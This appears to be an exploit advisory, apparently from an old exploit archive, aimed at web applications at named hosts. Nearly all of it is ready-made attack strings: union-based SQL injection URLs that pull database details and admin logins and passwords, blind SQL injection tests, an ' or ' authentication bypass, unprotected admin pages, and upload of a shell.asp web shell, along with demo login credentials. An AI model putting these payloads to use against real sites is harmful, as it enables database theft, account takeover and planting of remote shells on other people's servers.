"Şeytan İçinde ki Sestir; O Sese Kulak Ver"
Discovered By: ZoRLu
you must login to site
R-Sql
z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16
for demo:
user: trt-turk@hotmail.com
pass: salla1
http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16
link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
